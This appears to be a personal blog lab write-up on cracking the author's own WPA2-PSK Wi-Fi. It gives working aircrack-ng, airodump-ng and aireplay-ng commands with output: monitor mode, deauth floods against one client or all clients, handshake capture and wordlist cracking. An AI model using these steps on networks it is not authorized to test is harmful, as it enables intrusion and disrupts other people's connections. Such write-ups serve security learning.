2025-02-20 Hacking your Wi-Fi ============================= .. post:: Feb 24, 2025 :tags: Wi-Fi, WPA2-PSK, aircrack-ng, deauth, hacking, security :category: Networks, Cybersecurity :author: ccli :language: en .. toctree:: :numbered: Today I will be practicing WPA2-PSK security and attempting to extract and crack a PSK hash. Let's get started. .. caution:: I am not responsible for any malicious, unethical, or destructive behavior done by anyone following this post. I cannot guarantee any of the tools I use are safe. All readers should practice extreme caution when attempting anything written here. You *can* go to jail if you do not act within the proper scope. All of these exercises were done on personal networks that I had authorization to test. .. note:: This post took inspiration from the following book: ``Network Basics For Hackers`` by ``OccupytheWeb, Master`` ``2023`` **Step 1** Setting up ...................... First, we need to install a few tools: * aircrack-ng aircrack-ng is one of the most essential tools for any cybersecurity professional. It contains almost everything a hacker needs to monitor and pentest a wireless network. We will also be using ``airmon`` for finding BSSIDs and intercepting traffic. Airmon comes in the aircrack-ng suite so no installation is needed. **Step 2** Compiling ..................... I simply needed to run: ``sudo emerge aircrack-ng`` **Step 3** Starting aircrack-ng ............................... First, we need to figure out what our wireless interface is called. We can run ``ifconfig`` to see that *my* interface is named ``wlan0``. The next thing we need to do is start aircrack-ng and put our WLAN adapter into monitor mode with the following command: .. code:: bash airmon-ng start wlan0 This deleted our ``wlan0`` interface and replaced it with ``wlan0mon``. Now let's intercept a handshake to get our PSK (Pre-Shared-Key) hash. Now, for the purpose of this lab, I will be connecting my phone to the network I am attacking. Its MAC will be "22:8F:1B:9A:10:51"; our AP will be "12:34:56:78:9A:BC". First, we need to monitor the network. We can run: .. code:: bash sudo airodump-ng --bssid 12:34:56:78:9A:BC -c 6 -w capture_file wlan0mon We will get a TUI output like this: .. code:: CH 6 ][ Elapsed: 1 min ][ 2025-02-21 11:39 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 12:34:56:78:9A:BC -41 100 675 0 0 6 360 WPA2 CCMP PSK my_network BSSID STATION PWR Rate Lost Frames Notes Probes 12:34:56:78:9A:BC 22:8F:1B:9A:10:51 -46 0 - 1 0 1863 Let's break down the important flags here. ``Beacons: 675`` A beacon is the AP's way of telling other devices "I exist, come connect," so we know for sure the AP is up and accepting connections. We can also see our network uses WPA2-PSK, so we can continue with the attack. **Step 4** Deauth .................. While we keep our monitor program running, let's try to deauth my phone. We can run the following command to send deauth packets to my phone's MAC: .. code:: bash sudo aireplay-ng --deauth 500 -a 12:34:56:78:9A:BC -c 22:8F:1B:9A:10:51 -D wlan0mon If it is successful, we will see an output like this: .. code:: 11:37:30 Sending 64 directed DeAuth (code 7). STMAC: [22:8F:1B:9A:10:51] [ 0|13 ACKs] 11:37:31 Sending 64 directed DeAuth (code 7). STMAC: [22:8F:1B:9A:10:51] [ 0|22 ACKs] **Step 5** Coming to terms ........................... At this point, we realize that our router has Protected Management Frames (PMF) enabled. We know this by filtering Wireshark. We can inspect our ``wlan0mon`` beacons and find the RSN/Auth information: .. code:: bash Auth Key Management (AKM) Suite Count: 1 Auth Key Management (AKM) List 00:1a:2b (IEEE 802.11) PSK A PMF is a security measure which provides protection for unicast and multicast management action frames which would prevent this type of deauthentication attack [1]. **BUT** for the sake of this lab, we can disable this and get hacking. **Step 6** Redemption ...................... Now that I have set up a badly configured router (don't worry, it stays on the LAN only), we can actually proceed with the deauth attack. I will connect my phone to our Wi-Fi network and run the following command: .. code:: bash sudo aireplay-ng --deauth 1000 -a 12:34:56:78:9A:BC wlan0mon .. note:: I could pass my phone's MAC (hence the warning), however, this way would disconnect every device from the network. **Step 7** Stealing the password ................................. After sending our deauth packet, we will monitor our network with ``airodump-ng`` to intercept the 4-way handshake our phone makes after the deauth attack ends. Now we need to send our deauthentication packets until we see ``WPA handshake: XX:XX:XX:XX:XX:XX`` appear in the top right corner of our ``airodump-ng`` interface. .. code:: bash CH 6 | Elapsed: 42 s | 2025-02-22 01:48 | **WPA handshake: 12:34:56:78:9A:BC** Once we see this, we can safely kill the attack and the monitor since we have intercepted the PSK hash. **Step 8** Getting the password ............................... Now all we have to do is crack the password. For this, we will use ``aircrack-ng``. We will also need a wordlist. I will be using the 10k most common password list for this lab. To begin brute forcing, we will run: .. code:: aircrack-ng netgeargetpsk-01.cap -w ../../lists/10kcommon.txt And in about 2 seconds, we can see the password in cleartext! .. code:: Aircrack-ng 1.7 [00:00:00] 8776/10000 keys tested (18813.56 k/s) Time left: 0 seconds 87.76% KEY FOUND! [ password ] **Conclusions** ............... When I first started learning networks, I didn't think I would ever enjoy learning how Wi-Fi worked, but this lab has made me realize wireless networks are one of the most interesting parts of networking. I am considering trying a Bluetooth-based attack next. Sources -------- .. [1] https://www.wi-fi.org/knowledge-center/faq/what-are-protected-management-frames